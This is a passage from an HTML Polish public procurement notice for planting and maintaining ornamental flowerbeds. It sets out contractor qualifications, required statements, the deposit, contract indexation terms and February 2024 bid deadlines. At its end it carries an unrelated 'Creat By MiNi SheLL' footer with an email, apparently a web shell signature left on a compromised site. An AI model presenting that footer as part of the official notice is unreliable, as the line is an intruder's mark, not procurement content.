skrzyń z materiałem roślinnym w obszar rabat i dywanów kwiatowych.<br/>Dysponowanie odpowiednim potencjałem kadrowym, tj. 5 osób posiadających umiejętności w zakresie wysadzania roślin ozdobnych i ich pielęgnacji. Wykonawca wykaże, że będzie zatrudniać przy realizacji zamówienia przez cały okres obowiązywania umowy co najmniej 1 pracownika na umowę o pracę. <br/><br/>c) sytuacji ekonomicznej i finansowej;<br/>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż: <br/>1. znajduje się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia: tj. posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 100.000,00zł.<br/>2. posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. <br/><br/>	d) nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust.1 i 109 ust.1 ustawy Pzp<br/> e) spełniają wymogi określone w specyfikacji istotnych warunków zamówienia <br/><br/>	Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.<br/>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.<br/>Jeżeli Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe Podwykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 118 Ustawy zobowiązany jest podać nazwę (firmę) Podwykonawcy, a także aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, że podwykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu;<br/><br/>UWAGA:<br/>	Wraz z ofertą wykonawca składa:<br/>Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu na podst. art. 125 ust. 1 w związku z art. 266 ustawy Pzp, natomiast przed udzieleniem zamówienia Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów, o których mowa w pkt 21 niniejszej specyfikacji, potwierdzających okoliczności, o których mowa w art. 57 ust. 1 i 2. <br/>Zamawiający żądać będzie od wykonawcy, którego oferta została wybrana jako najkorzystniejsza, wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% wartości zamówienia brutto. Zabezpieczenie musi być wniesione najpóźniej w dniu podpisania umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty wymagane przez Zamawiającego do złożenia wraz z ofertą: <br/>1.	Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu na podst. art. 125 ust. 1 w związku z art. 266 ustawy Pzp,<br/>2.	Informacja dotycząca części zamówienia, której wykonanie wykonawca powierzy Podwykonawcom, <br/>3.	Informacja o nazwie (firmie) Podwykonawcy, jeżeli Wykonawca powołuje się na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia lub zdolności finansowe Podwykonawcy w celu wykazania spełnienia warunków udziału w postępowaniu,<br/>4.	Oświadczenie Wykonawcy dot. RODO,<br/>5.	Dowód wniesienia wadium w kwocie i formie określonej w punkcie 28 specyfikacji.<br/>6.	Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą cenę zamówienia.<br/>7.	Wstępny harmonogram robót.<br/>8.	Informacja o wielkości /w procentach/ uzupełniania na własny koszt ubytków w nasadzeniach niezbędna do oceny oferty zgodnie z pkt 17 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 2000 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wprowadzenie zmian do umowy dopuszcza się w sytuacjach określonych w art. 455 ust.1 pkt 4 oraz ust.2 ustawy Prawo zamówień publicznych<br/>2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>3. Do każdej propozycji zmiany, inicjujący zmianę przedstawi:<br/>a) opis propozycji zmiany, w tym wpływ na terminy wykonania,<br/>b) uzasadnienie zmiany,<br/> c) obliczenia uzasadniające ewentualną zmianę wynagrodzenia.<br/>4. Zgodnie z art. 439 ustawy Pzp dopuszcza się waloryzację cen jednostkowych netto według wskaźnika wzrostu cen towarów i usług konsumpcyjnych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS.<br/>5. Waloryzacja jest dopuszczalna w razie łącznego spełnienia następujących warunków:<br/>	1) złożenie pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do dwukrotnej w ciągu trwania umowy waloryzacji na swoją korzyść; 2) upływu sześciu miesięcy od rozpoczęcia realizacji umowy;<br/>	3) zmiany wskaźnika przekraczającej 20 punktów procentowych w stosunku do cen z miesiąca zawarcia umowy<br/>6. Waloryzację przeprowadza się w następujący sposób:<br/>a) stosuje się wskaźnik z najnowszego Biuletynu dostępnego na stronie internetowej GUS na dzień złożenia wniosku;<br/>b) przy pierwszej waloryzacji – w odniesieniu do cen z miesiąca zawarcia umowy<br/>c) przy kolejnej waloryzacji – w odniesieniu do cen z poprzedniej waloryzacji;<br/>7. Każdorazowa waloryzacja polega na zmianie cen o nie więcej niż o ułamek wynoszący 0,5 w stosunku do wysokości wskaźnika zmiany cen, o którym mowa w ust.3. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza ofertowego dostępnego na platformie e-Zamówienia, zgodnie z instrukcją dostępną w Centrum Pomocy platformy e-zamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com